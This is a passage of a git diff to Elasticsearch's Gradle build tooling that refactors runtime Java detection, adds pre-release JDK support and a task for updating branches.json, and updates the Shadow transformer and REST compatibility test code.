final Logger LOGGER = Logging.getLogger(GlobalBuildInfoPlugin.class); private static final String DEFAULT_VERSION_JAVA_FILE_PATH = "server/src/main/java/org/elasticsearch/Version.java"; + private static final String DEFAULT_BRANCHES_FILE_URL = "https://raw.githubusercontent.com/elastic/elasticsearch/main/branches.json"; + private static final String BRANCHES_FILE_LOCATION_PROPERTY = "org.elasticsearch.build.branches-file-location"; + private static final Pattern LINE_PATTERN = Pattern.compile( + "\\W+public static final Version V_(\\d+)_(\\d+)_(\\d+)(_alpha\\d+|_beta\\d+|_rc\\d+)?.*\\);" + ); private ObjectFactory objectFactory; private final JavaInstallationRegistry javaInstallationRegistry; private final JvmMetadataDetector metadataDetector; private final ProviderFactory providers; - private final ObjectMapper objectMapper; + private final BranchesFileParser branchesFileParser; private JavaToolchainService toolChainService; private Project project; @@ -87,7 +102,7 @@ public GlobalBuildInfoPlugin( this.javaInstallationRegistry = javaInstallationRegistry; this.metadataDetector = new ErrorTraceMetadataDetector(metadataDetector); this.providers = providers; - this.objectMapper = new ObjectMapper(); + this.branchesFileParser = new BranchesFileParser(new ObjectMapper()); } @Override @@ -97,6 +112,7 @@ public void apply(Project project) { } this.project = project; project.getPlugins().apply(JvmToolchainsPlugin.class); + project.getPlugins().apply(JdkDownloadPlugin.class); Provider gitInfo = project.getPlugins().apply(GitInfoPlugin.class).getGitInfo(); toolChainService = project.getExtensions().getByType(JavaToolchainService.class); @@ -105,41 +121,27 @@ public void apply(Project project) { throw new GradleException("Gradle " + minimumGradleVersion.getVersion() + "+ is required"); } - JavaVersion minimumCompilerVersion = JavaVersion.toVersion(getResourceContents("/minimumCompilerVersion")); - JavaVersion minimumRuntimeVersion = JavaVersion.toVersion(getResourceContents("/minimumRuntimeVersion")); + project.getPlugins().apply(VersionPropertiesPlugin.class); + Properties versionProperties = (Properties) project.getExtensions().getByName(VERSIONS_EXT); + JavaVersion minimumCompilerVersion = JavaVersion.toVersion(versionProperties.get("minimumCompilerJava")); + JavaVersion minimumRuntimeVersion = JavaVersion.toVersion(versionProperties.get("minimumRuntimeJava")); - Provider explicitRuntimeJavaHome = findRuntimeJavaHome(); - boolean isRuntimeJavaHomeExplicitlySet = explicitRuntimeJavaHome.isPresent(); - Provider actualRuntimeJavaHome = isRuntimeJavaHomeExplicitlySet - ? explicitRuntimeJavaHome - : resolveJavaHomeFromToolChainService(VersionProperties.getBundledJdkMajorVersion()); + Version elasticsearchVersionProperty = Version.fromString(versionProperties.getProperty("elasticsearch")); - Provider runtimeJdkMetaData = actualRuntimeJavaHome.map( - runtimeJavaHome -> metadataDetector.getMetadata(getJavaInstallation(runtimeJavaHome)) - ); + RuntimeJava runtimeJavaHome = findRuntimeJavaHome(); AtomicReference cache = new AtomicReference<>(); Provider bwcVersionsProvider = providers.provider( - () -> cache.updateAndGet(val -> val == null ? resolveBwcVersions() : val) + () -> cache.updateAndGet(val -> val == null ? resolveBwcVersions(elasticsearchVersionProperty) : val) ); + BuildParameterExtension buildParams = project.getExtensions() .create( BuildParameterExtension.class, BuildParameterExtension.EXTENSION_NAME, DefaultBuildParameterExtension.class, providers, - actualRuntimeJavaHome, + runtimeJavaHome, resolveToolchainSpecFromEnv(), - actualRuntimeJavaHome.map( - javaHome -> determineJavaVersion( - "runtime java.home", - javaHome, - isRuntimeJavaHomeExplicitlySet - ? minimumRuntimeVersion - : JavaVersion.toVersion(VersionProperties.getBundledJdkMajorVersion()) - ) - ), - isRuntimeJavaHomeExplicitlySet, - runtimeJdkMetaData.map(m -> formatJavaVendorDetails(m)), getAvailableJavaVersions(), minimumCompilerVersion, minimumRuntimeVersion, @@ -189,32 +191,49 @@ private String formatJavaVendorDetails(JvmInstallationMetadata runtimeJdkMetaDat /* Introspect all versions of ES that may be tested against for backwards * compatibility. It is *super* important that this logic is the same as the * logic in VersionUtils.java. */ - private BwcVersions resolveBwcVersions() { + private BwcVersions resolveBwcVersions(Version currentElasticsearchVersion) { String versionsFilePath = elvis( System.getProperty("BWC_VERSION_SOURCE"), new File(Util.locateElasticsearchWorkspace(project.getGradle()), DEFAULT_VERSION_JAVA_FILE_PATH).getPath() ); try (var is = new FileInputStream(versionsFilePath)) { List versionLines = IOUtils.readLines(is, "UTF-8"); - return new BwcVersions(versionLines, getDevelopmentBranches()); + return new BwcVersions(currentElasticsearchVersion, parseVersionLines(versionLines), getDevelopmentBranches()); } catch (IOException e) { throw new IllegalStateException("Unable to resolve to resolve bwc versions from versionsFile.", e); } } - private List getDevelopmentBranches() { - List branches = new ArrayList<>(); - File branchesFile = new File(Util.locateElasticsearchWorkspace(project.getGradle()), "branches.json"); - try (InputStream is = new FileInputStream(branchesFile)) { - JsonNode json = objectMapper.readTree(is); - for (JsonNode node : json.get("branches")) { - branches.add(node.get("branch").asText()); + private List parseVersionLines(List versionLines) { + return versionLines.stream() + .map(LINE_PATTERN::matcher) + .filter(Matcher::matches) + .map(match -> new Version(Integer.parseInt(match.group(1)), Integer.parseInt(match.group(2)), Integer.parseInt(match.group(3)))) + .sorted() + .toList(); + } + + private List getDevelopmentBranches() { + String branchesFileLocation = project.getProviders() + .gradleProperty(BRANCHES_FILE_LOCATION_PROPERTY) + .getOrElse(DEFAULT_BRANCHES_FILE_URL); + LOGGER.info("Reading branches.json from {}", branchesFileLocation); + byte[] branchesBytes; + if (branchesFileLocation.startsWith("http")) { + try (InputStream in = URI.create(branchesFileLocation).toURL().openStream()) { + branchesBytes = in.readAllBytes(); + } catch (IOException e) { + throw new UncheckedIOException("Failed to download branches.json from: " + branchesFileLocation, e); + } + } else { + try { + branchesBytes = Files.readAllBytes(new File(branchesFileLocation).toPath()); + } catch (IOException e) { + throw new UncheckedIOException("Failed to read branches.json from: " + branchesFileLocation, e); } - } catch (IOException e) { - throw new UncheckedIOException(e); } - return branches; + return branchesFileParser.parse(branchesBytes); } private void logGlobalBuildInfo(BuildParameterExtension buildParams) { @@ -229,7 +248,7 @@ private void logGlobalBuildInfo(BuildParameterExtension buildParams) { LOGGER.quiet("Elasticsearch Build Hamster says Hello!"); LOGGER.quiet(" Gradle Version : " + GradleVersion.current().getVersion()); LOGGER.quiet(" OS Info : " + osName + " " + osVersion + " (" + osArch + ")"); - if (buildParams.getIsRuntimeJavaHomeSet()) { + if (buildParams.getRuntimeJava().isExplicitlySet()) { JvmInstallationMetadata runtimeJvm = metadataDetector.getMetadata(getJavaInstallation(buildParams.getRuntimeJavaHome().get())); final String runtimeJvmVendorDetails = runtimeJvm.getVendor().getDisplayName(); final String runtimeJvmImplementationVersion = runtimeJvm.getJvmVersion(); @@ -270,7 +289,9 @@ private JavaVersion determineJavaVersion(String description, File javaHome, Java private InstallationLocation getJavaInstallation(File javaHome) { return getAvailableJavaInstallationLocationSteam().filter(installationLocation -> isSameFile(javaHome, installationLocation)) .findFirst() - .orElseThrow(() -> new GradleException("Could not locate available Java installation in Gradle registry at: " + javaHome)); + .orElse( + InstallationLocation.userDefined(javaHome, "Manually resolved JavaHome (not auto-detected by Gradle toolchain service)") + ); } private boolean isSameFile(File javaHome, InstallationLocation installationLocation) { @@ -334,26 +355,80 @@ private static void assertMinimumCompilerVersion(JavaVersion minimumCompilerVers } } - private Provider findRuntimeJavaHome() { - String runtimeJavaProperty = System.getProperty("runtime.java"); + private RuntimeJava findRuntimeJavaHome() { + Properties versionProperties = (Properties) project.getExtensions().getByName(VERSIONS_EXT); + String bundledJdkVersion = versionProperties.getProperty("bundled_jdk"); + String bundledJdkMajorVersion = bundledJdkVersion.split("[.+]")[0]; + String runtimeJavaProperty = System.getProperty("runtime.java"); if (runtimeJavaProperty != null) { - return resolveJavaHomeFromToolChainService(runtimeJavaProperty); + if (runtimeJavaProperty.toLowerCase().endsWith("-pre")) { + // handle pre-release builds differently due to lack of support in Gradle toolchain service + // we resolve them using JdkDownloadPlugin for now. + return resolvePreReleaseRuntimeJavaHome(runtimeJavaProperty, bundledJdkMajorVersion); + } else { + return runtimeJavaHome(resolveJavaHomeFromToolChainService(runtimeJavaProperty), true, bundledJdkMajorVersion); + } } if (System.getenv("RUNTIME_JAVA_HOME") != null) { - return providers.provider(() -> new File(System.getenv("RUNTIME_JAVA_HOME"))); + return runtimeJavaHome(providers.provider(() -> new File(System.getenv("RUNTIME_JAVA_HOME"))), true, bundledJdkVersion); } // fall back to tool chain if set. String env = System.getenv("JAVA_TOOLCHAIN_HOME"); - return providers.provider(() -> { - if (env == null) { - return null; - } - return new File(env); + boolean explicitlySet = env != null; + Provider javaHome = explicitlySet + ? providers.provider(() -> new File(env)) + : resolveJavaHomeFromToolChainService(bundledJdkMajorVersion); + return runtimeJavaHome(javaHome, explicitlySet, bundledJdkMajorVersion); + } + + private RuntimeJava runtimeJavaHome(Provider fileProvider, boolean explicitlySet, String bundledJdkMajorVersion) { + return runtimeJavaHome(fileProvider, explicitlySet, null, null, bundledJdkMajorVersion); + } + + private RuntimeJava runtimeJavaHome( + Provider fileProvider, + boolean explicitlySet, + String preReleasePostfix, + Integer buildNumber, + String bundledJdkMajorVersion + ) { + Provider javaVersion = fileProvider.map( + javaHome -> determineJavaVersion( + "runtime java.home", + javaHome, + fileProvider.isPresent() + ? JavaVersion.toVersion(getResourceContents("/minimumRuntimeVersion")) + : JavaVersion.toVersion(bundledJdkMajorVersion) + ) + ); + + Provider vendorDetails = fileProvider.map(j -> metadataDetector.getMetadata(getJavaInstallation(j))) + .map(m -> formatJavaVendorDetails(m)); + + return new RuntimeJava(fileProvider, javaVersion, vendorDetails, explicitlySet, preReleasePostfix, buildNumber); + } + + private RuntimeJava resolvePreReleaseRuntimeJavaHome(String runtimeJavaProperty, String bundledJdkMajorVersion) { + var major = JavaLanguageVersion.of(Integer.parseInt(runtimeJavaProperty.substring(0, runtimeJavaProperty.length() - 4))); + Integer buildNumber = Integer.getInteger("runtime.java.build"); + var jdkbuild = buildNumber == null ? findLatestPreReleaseBuild(major) : findPreReleaseBuild(major, buildNumber); + String preReleaseType = jdkbuild.type(); + String prVersionString = String.format("%d-%s+%d", major.asInt(), preReleaseType, jdkbuild.buildNumber()); + NamedDomainObjectContainer container = (NamedDomainObjectContainer) project.getExtensions().getByName("jdks"); + Jdk jdk = container.create(preReleaseType + "_" + major.asInt(), j -> { + j.setVersion(prVersionString); + j.setVendor("openjdk"); + j.setPlatform(OS.current().javaOsReference); + j.setArchitecture(Architecture.current().javaClassifier); + j.setDistributionVersion(preReleaseType); }); + // We on purpose resolve this here eagerly to ensure we resolve the jdk configuration in the context of the root project. + // If we keep this lazy we can not guarantee in which project context this is resolved which will fail the build. + File file = new File(jdk.getJavaHomePath().toString()); + return runtimeJavaHome(providers.provider(() -> file), true, preReleaseType, jdkbuild.buildNumber(), bundledJdkMajorVersion); } - @NotNull private Provider resolveJavaHomeFromToolChainService(String version) { Property value = objectFactory.property(JavaLanguageVersion.class).value(JavaLanguageVersion.of(version)); return toolChainService.launcherFor(javaToolchainSpec -> javaToolchainSpec.getLanguageVersion().value(value)) @@ -410,4 +485,5 @@ public void execute(JavaToolchainSpec spec) { spec.getLanguageVersion().set(expectedJavaLanguageVersion); } } + } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/RuntimeJava.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/RuntimeJava.java new file mode 100644 index 0000000000000..7935d87256f89 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/RuntimeJava.java @@ -0,0 +1,73 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.info; + +import org.gradle.api.JavaVersion; +import org.gradle.api.provider.Provider; + +import java.io.File; + +public class RuntimeJava { + + private final Provider javahome; + private final Provider javaVersion; + private final boolean explicitlySet; + private final String preReleaseType; + private final Provider vendorDetails; + private final Integer buildNumber; + + RuntimeJava(Provider javahome, Provider javaVersion, Provider vendorDetails, boolean explicitlySet) { + this(javahome, javaVersion, vendorDetails, explicitlySet, null, null); + } + + RuntimeJava( + Provider javahome, + Provider javaVersion, + Provider vendorDetails, + boolean explicitlySet, + String preReleaseType, + Integer buildNumber + ) { + this.javahome = javahome; + this.javaVersion = javaVersion; + this.vendorDetails = vendorDetails; + this.explicitlySet = explicitlySet; + this.preReleaseType = preReleaseType; + this.buildNumber = buildNumber; + } + + public Provider getJavahome() { + return javahome; + } + + public boolean isPreRelease() { + return preReleaseType != null; + } + + public Provider getJavaVersion() { + return javaVersion; + } + + public Provider getVendorDetails() { + return vendorDetails; + } + + public boolean isExplicitlySet() { + return explicitlySet; + } + + public String getPreReleaseType() { + return preReleaseType; + } + + public Integer getBuildNumber() { + return buildNumber; + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/precommit/ThirdPartyAuditTask.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/precommit/ThirdPartyAuditTask.java index 1acdc794ee0d2..c60feab80fcf3 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/precommit/ThirdPartyAuditTask.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/precommit/ThirdPartyAuditTask.java @@ -61,6 +61,8 @@ import static org.gradle.api.JavaVersion.VERSION_22; import static org.gradle.api.JavaVersion.VERSION_23; import static org.gradle.api.JavaVersion.VERSION_24; +import static org.gradle.api.JavaVersion.VERSION_25; +import static org.gradle.api.JavaVersion.VERSION_26; @CacheableTask public abstract class ThirdPartyAuditTask extends DefaultTask { @@ -342,12 +344,14 @@ private String runForbiddenAPIsCli() throws IOException { spec.setExecutable(javaHome.get() + "/bin/java"); } spec.classpath(getForbiddenAPIsClasspath(), getThirdPartyClasspath()); - // Enable explicitly for each release as appropriate. Just JDK 20/21/22/23/24 for now, and just the vector module. + // Enable explicitly for each release as appropriate and just the vector module. if (isJavaVersion(VERSION_20) || isJavaVersion(VERSION_21) || isJavaVersion(VERSION_22) || isJavaVersion(VERSION_23) - || isJavaVersion(VERSION_24)) { + || isJavaVersion(VERSION_24) + || isJavaVersion(VERSION_25) + || isJavaVersion(VERSION_26)) { spec.jvmArgs("--add-modules", "jdk.incubator.vector"); } spec.jvmArgs("-Xmx1g"); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/release/ReleaseToolsPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/release/ReleaseToolsPlugin.java index fce8b0c545dbb..f0fb0073d4350 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/release/ReleaseToolsPlugin.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/release/ReleaseToolsPlugin.java @@ -53,6 +53,7 @@ public void apply(Project project) { project.getTasks().register("extractCurrentVersions", ExtractCurrentVersionsTask.class); project.getTasks().register("tagVersions", TagVersionsTask.class); project.getTasks().register("setCompatibleVersions", SetCompatibleVersionsTask.class, t -> t.setThisVersion(version)); + project.getTasks().register("updateBranchesJson", UpdateBranchesJsonTask.class); final Directory changeLogDirectory = projectDirectory.dir("docs/changelog"); final Directory changeLogBundlesDirectory = projectDirectory.dir("docs/release-notes/changelog-bundles"); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/release/UpdateBranchesJsonTask.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/release/UpdateBranchesJsonTask.java new file mode 100644 index 0000000000000..584bfc07693e2 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/release/UpdateBranchesJsonTask.java @@ -0,0 +1,176 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.release; + +import com.fasterxml.jackson.core.util.DefaultIndenter; +import com.fasterxml.jackson.core.util.DefaultPrettyPrinter; +import com.fasterxml.jackson.databind.JsonNode; +import com.fasterxml.jackson.databind.ObjectMapper; +import com.fasterxml.jackson.databind.node.ArrayNode; +import com.fasterxml.jackson.databind.node.ObjectNode; + +import org.elasticsearch.gradle.Version; +import org.elasticsearch.gradle.internal.info.BranchesFileParser; +import org.elasticsearch.gradle.internal.info.DevelopmentBranch; +import org.gradle.api.DefaultTask; +import org.gradle.api.InvalidUserDataException; +import org.gradle.api.file.ProjectLayout; +import org.gradle.api.logging.Logger; +import org.gradle.api.logging.Logging; +import org.gradle.api.tasks.Input; +import org.gradle.api.tasks.Optional; +import org.gradle.api.tasks.OutputFile; +import org.gradle.api.tasks.TaskAction; +import org.gradle.api.tasks.options.Option; + +import java.io.File; +import java.io.FileInputStream; +import java.io.IOException; +import java.io.UncheckedIOException; +import java.nio.file.Files; +import java.util.Comparator; +import java.util.List; + +import javax.inject.Inject; + +/** + * Updates the branches.json file in the root of the repository + */ +public class UpdateBranchesJsonTask extends DefaultTask { + + private static final Logger LOGGER = Logging.getLogger(UpdateBranchesJsonTask.class); + + private final ObjectMapper objectMapper; + private final BranchesFileParser branchesFileParser; + + @OutputFile + private File branchesFile; + + @Input + @Optional + private DevelopmentBranch addBranch; + @Input + @Optional + private String removeBranch; + @Input + @Optional + private DevelopmentBranch updateBranch; + + @Inject + public UpdateBranchesJsonTask(ProjectLayout projectLayout) { + this.objectMapper = new ObjectMapper(); + this.branchesFileParser = new BranchesFileParser(objectMapper); + this.branchesFile = projectLayout.getSettingsDirectory().file("branches.json").getAsFile(); + } + + public File getBranchesFile() { + return branchesFile; + } + + public void setBranchesFile(File branchesFile) { + this.branchesFile = branchesFile; + } + + public DevelopmentBranch getAddBranch() { + return addBranch; + } + + public String getRemoveBranch() { + return removeBranch; + } + + public DevelopmentBranch getUpdateBranch() { + return updateBranch; + } + + @Option(option = "add-branch", description = "Specifies the branch and corresponding version to add in format :") + public void addBranch(String branchAndVersion) { + this.addBranch = toDevelopmentBranch(branchAndVersion); + } + + @Option(option = "remove-branch", description = "Specifies the branch to remove") + public void removeBranch(String branch) { + this.removeBranch = branch; + } + + @Option(option = "update-branch", description = "Specifies the branch and corresponding version to update in format :") + public void updateBranch(String branchAndVersion) { + this.updateBranch = toDevelopmentBranch(branchAndVersion); + } + + private DevelopmentBranch toDevelopmentBranch(String branchAndVersion) { + String[] parts = branchAndVersion.split(":"); + if (parts.length != 2) { + throw new InvalidUserDataException("Expected branch and version in format :"); + } + return new DevelopmentBranch(parts[0], Version.fromString(parts[1])); + } + + @TaskAction + public void executeTask() throws IOException { + List developmentBranches = readBranches(branchesFile); + + if (addBranch == null && removeBranch == null && updateBranch == null) { + throw new InvalidUserDataException("At least one of add-branch, remove-branch or update-branch must be specified"); + } + + if (addBranch != null) { + LOGGER.info("Adding branch {} with version {}", addBranch.name(), addBranch.version()); + if (developmentBranches.stream().anyMatch(developmentBranch -> developmentBranch.name().equals(addBranch.name()))) { + throw new InvalidUserDataException("Branch " + addBranch.name() + " already exists"); + } + developmentBranches.add(addBranch); + } + if (removeBranch != null) { + LOGGER.info("Removing branch {}", removeBranch); + if (developmentBranches.stream().noneMatch(developmentBranch -> developmentBranch.name().equals(removeBranch))) { + throw new InvalidUserDataException("Branch " + removeBranch + " does not exist"); + } + developmentBranches.removeIf(developmentBranch -> developmentBranch.name().equals(removeBranch)); + } + if (updateBranch != null) { + LOGGER.info("Updating branch {} with version {}", updateBranch.name(), updateBranch.version()); + if (developmentBranches.stream().noneMatch(developmentBranch -> developmentBranch.name().equals(updateBranch.name()))) { + throw new InvalidUserDataException("Branch " + updateBranch.name() + " does not exist"); + } + developmentBranches.removeIf(developmentBranch -> developmentBranch.name().equals(updateBranch.name())); + developmentBranches.add(updateBranch); + } + + developmentBranches.sort(Comparator.comparing(DevelopmentBranch::version).reversed()); + + JsonNode jsonNode = objectMapper.readTree(new FileInputStream(branchesFile)); + ArrayNode updatedBranches = objectMapper.createArrayNode(); + for (DevelopmentBranch branch : developmentBranches) { + ObjectNode objectNode = objectMapper.createObjectNode(); + objectNode.put("branch", branch.name()); + objectNode.put("version", branch.version().toString()); + updatedBranches.add(objectNode); + } + ((ObjectNode) jsonNode).replace("branches", updatedBranches); + + DefaultPrettyPrinter prettyPrinter = new DefaultPrettyPrinter(); + prettyPrinter.indentArraysWith(new DefaultIndenter(" ", DefaultIndenter.SYS_LF)); + objectMapper.writer(prettyPrinter).writeValue(branchesFile, jsonNode); + } + + private List readBranches(File branchesFile) { + if (branchesFile.isFile() == false) { + throw new InvalidUserDataException("File branches.json has not been found in " + branchesFile.getAbsolutePath()); + } + + try { + byte[] branchesBytes = Files.readAllBytes(branchesFile.toPath()); + return branchesFileParser.parse(branchesBytes); + } catch (IOException e) { + throw new UncheckedIOException("Failed to read branches.json from " + branchesFile.getPath(), e); + } + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/shadow/XmlClassRelocationTransformer.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/shadow/XmlClassRelocationTransformer.java index 57afa7014240b..83af018c0924f 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/shadow/XmlClassRelocationTransformer.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/shadow/XmlClassRelocationTransformer.java @@ -9,10 +9,9 @@ package org.elasticsearch.gradle.internal.shadow; -import com.github.jengelman.gradle.plugins.shadow.ShadowStats; import com.github.jengelman.gradle.plugins.shadow.relocation.RelocateClassContext; import com.github.jengelman.gradle.plugins.shadow.relocation.Relocator; -import com.github.jengelman.gradle.plugins.shadow.transformers.Transformer; +import com.github.jengelman.gradle.plugins.shadow.transformers.ResourceTransformer; import com.github.jengelman.gradle.plugins.shadow.transformers.TransformerContext; import org.apache.commons.io.IOUtils; @@ -26,7 +25,7 @@ import java.io.BufferedInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; -import java.util.List; +import java.util.Set; import javax.xml.parsers.DocumentBuilder; import javax.xml.parsers.DocumentBuilderFactory; @@ -35,7 +34,7 @@ import javax.xml.transform.dom.DOMSource; import javax.xml.transform.stream.StreamResult; -public class XmlClassRelocationTransformer implements Transformer { +public class XmlClassRelocationTransformer implements ResourceTransformer { boolean hasTransformedResource = false; @@ -55,7 +54,7 @@ public boolean canTransformResource(FileTreeElement element) { @Override public void transform(TransformerContext context) { try { - BufferedInputStream bis = new BufferedInputStream(context.getIs()); + BufferedInputStream bis = new BufferedInputStream(context.getInputStream()); DocumentBuilderFactory dbFactory = DocumentBuilderFactory.newInstance(); DocumentBuilder dBuilder = dbFactory.newDocumentBuilder(); doc = dBuilder.parse(bis); @@ -66,17 +65,16 @@ public void transform(TransformerContext context) { this.doc = null; } } catch (Exception e) { - throw new RuntimeException("Error parsing xml file in " + context.getIs(), e); + throw new RuntimeException("Error parsing xml file in " + context.getInputStream(), e); } } private static String getRelocatedClass(String className, TransformerContext context) { - List relocators = context.getRelocators(); - ShadowStats stats = context.getStats(); + Set relocators = context.getRelocators(); if (className != null && className.length() > 0 && relocators != null) { for (Relocator relocator : relocators) { if (relocator.canRelocateClass(className)) { - RelocateClassContext relocateClassContext = new RelocateClassContext(className, stats); + RelocateClassContext relocateClassContext = new RelocateClassContext(className); return relocator.relocateClass(relocateClassContext); } } @@ -111,8 +109,6 @@ public boolean hasTransformedResource() { @Override public void modifyOutputStream(ZipOutputStream os, boolean preserveFileTimestamps) { ZipEntry entry = new ZipEntry(resource); - entry.setTime(TransformerContext.getEntryTimestamp(preserveFileTimestamps, entry.getTime())); - try { // Write the content back to the XML file TransformerFactory transformerFactory = TransformerFactory.newInstance(); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/compat/compat/RestCompatTestTransformTask.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/compat/compat/RestCompatTestTransformTask.java index 6d6590429feb1..31d4947b064f2 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/compat/compat/RestCompatTestTransformTask.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/compat/compat/RestCompatTestTransformTask.java @@ -26,6 +26,7 @@ import org.elasticsearch.gradle.VersionProperties; import org.elasticsearch.gradle.internal.test.rest.transform.RestTestTransform; import org.elasticsearch.gradle.internal.test.rest.transform.RestTestTransformer; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.elasticsearch.gradle.internal.test.rest.transform.close_to.ReplaceValueInCloseTo; import org.elasticsearch.gradle.internal.test.rest.transform.do_.ReplaceKeyInDo; import org.elasticsearch.gradle.internal.test.rest.transform.headers.InjectHeaders; @@ -169,7 +170,7 @@ public void skipTestsByFilePattern(String filePattern, String reason) { * @param value the value used in the replacement. For example "bar" */ public void replaceValueInMatch(String subKey, Object value) { - getTransformations().add(new ReplaceValueInMatch(subKey, MAPPER.convertValue(value, JsonNode.class))); + getTransformations().add(new ReplaceValueInMatch(subKey, SerializableJsonNode.of(value, JsonNode.class))); } /** @@ -180,7 +181,7 @@ public void replaceValueInMatch(String subKey, Object value) { * @param testName the testName to apply replacement */ public void replaceValueInMatch(String subKey, Object value, String testName) { - getTransformations().add(new ReplaceValueInMatch(subKey, MAPPER.convertValue(value, JsonNode.class), testName)); + getTransformations().add(new ReplaceValueInMatch(subKey, SerializableJsonNode.of(value, JsonNode.class), testName)); } /** @@ -225,7 +226,7 @@ public void replaceKeyInLength(String oldKeyName, String newKeyName) { * @param value the value used in the replacement. For example 99 */ public void replaceValueInLength(String subKey, int value) { - getTransformations().add(new ReplaceValueInLength(subKey, MAPPER.convertValue(value, NumericNode.class))); + getTransformations().add(new ReplaceValueInLength(subKey, SerializableJsonNode.of(value, NumericNode.class))); } /** @@ -237,7 +238,7 @@ public void replaceValueInLength(String subKey, int value) { * @param testName the testName to apply replacement */ public void replaceValueInLength(String subKey, int value, String testName) { - getTransformations().add(new ReplaceValueInLength(subKey, MAPPER.convertValue(value, NumericNode.class), testName)); + getTransformations().add(new ReplaceValueInLength(subKey, SerializableJsonNode.of(value, NumericNode.class), testName)); } /** @@ -260,7 +261,7 @@ public void replaceKeyInMatch(String oldKeyName, String newKeyName) { * @param testName the testName to apply replacement */ public void replaceValueInCloseTo(String subKey, double newValue, String testName) { - getTransformations().add(new ReplaceValueInCloseTo(subKey, MAPPER.convertValue(newValue, NumericNode.class), testName)); + getTransformations().add(new ReplaceValueInCloseTo(subKey, SerializableJsonNode.of(newValue, NumericNode.class), testName)); } /** @@ -271,7 +272,7 @@ public void replaceValueInCloseTo(String subKey, double newValue, String testNam * @param newValue the value used in the replacement. For example 9.5 */ public void replaceValueInCloseTo(String subKey, double newValue) { - getTransformations().add(new ReplaceValueInCloseTo(subKey, MAPPER.convertValue(newValue, NumericNode.class))); + getTransformations().add(new ReplaceValueInCloseTo(subKey, SerializableJsonNode.of(newValue, NumericNode.class))); } /** @@ -282,7 +283,7 @@ public void replaceValueInCloseTo(String subKey, double newValue) { * @param newValue the value used in the replacement */ public void replaceIsTrue(String oldValue, Object newValue) { - getTransformations().add(new ReplaceIsTrue(oldValue, MAPPER.convertValue(newValue, TextNode.class))); + getTransformations().add(new ReplaceIsTrue(oldValue, SerializableJsonNode.of(newValue, TextNode.class))); } /** @@ -294,7 +295,7 @@ public void replaceIsTrue(String oldValue, Object newValue) { * @param testName the testName to apply replacement */ public void replaceIsTrue(String oldValue, Object newValue, String testName) { - getTransformations().add(new ReplaceIsTrue(oldValue, MAPPER.convertValue(newValue, TextNode.class), testName)); + getTransformations().add(new ReplaceIsTrue(oldValue, SerializableJsonNode.of(newValue, TextNode.class), testName)); } /** @@ -305,7 +306,7 @@ public void replaceIsTrue(String oldValue, Object newValue, String testName) { * @param newValue the value used in the replacement */ public void replaceIsFalse(String oldValue, Object newValue) { - getTransformations().add(new ReplaceIsFalse(oldValue, MAPPER.convertValue(newValue, TextNode.class))); + getTransformations().add(new ReplaceIsFalse(oldValue, SerializableJsonNode.of(newValue, TextNode.class))); } /** @@ -317,7 +318,7 @@ public void replaceIsFalse(String oldValue, Object newValue) { * @param testName the testName to apply replacement */ public void replaceIsFalse(String oldValue, Object newValue, String testName) { - getTransformations().add(new ReplaceIsFalse(oldValue, MAPPER.convertValue(newValue, TextNode.class), testName)); + getTransformations().add(new ReplaceIsFalse(oldValue, SerializableJsonNode.of(newValue, TextNode.class), testName)); } /** @@ -329,7 +330,7 @@ public void replaceIsFalse(String oldValue, Object newValue, String testName) { * @param newValue the value used in the replacement */ public void replaceValueTextByKeyValue(String key, String oldValue, Object newValue) { - getTransformations().add(new ReplaceTextual(key, oldValue, MAPPER.convertValue(newValue, TextNode.class))); + getTransformations().add(new ReplaceTextual(key, oldValue, SerializableJsonNode.of(newValue, TextNode.class))); } /** @@ -342,7 +343,7 @@ public void replaceValueTextByKeyValue(String key, String oldValue, Object newVa * @param testName the testName to apply replacement */ public void replaceValueTextByKeyValue(String key, String oldValue, Object newValue, String testName) { - getTransformations().add(new ReplaceTextual(key, oldValue, MAPPER.convertValue(newValue, TextNode.class), testName)); + getTransformations().add(new ReplaceTextual(key, oldValue, SerializableJsonNode.of(newValue, TextNode.class), testName)); } /** @@ -376,7 +377,7 @@ public void removeMatch(String subKey, String testName) { * @param testName the testName to apply addition */ public void addMatch(String subKey, Object value, String testName) { - getTransformations().add(new AddMatch(subKey, MAPPER.convertValue(value, 